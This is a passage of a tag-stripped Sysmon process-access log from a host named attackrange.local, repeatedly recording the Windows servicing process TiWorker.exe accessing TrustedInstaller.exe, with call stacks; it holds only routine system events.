13:30:30.217{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012702Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.201{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012701Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.201{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012700Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.201{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012699Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.201{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012698Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.185{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012697Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.185{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012696Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.185{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012695Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.185{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012694Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.170{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012693Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.170{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012692Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.170{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012691Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.170{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012690Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.170{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012689Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.154{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012688Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.154{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012687Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.154{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012686Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.154{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012685Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 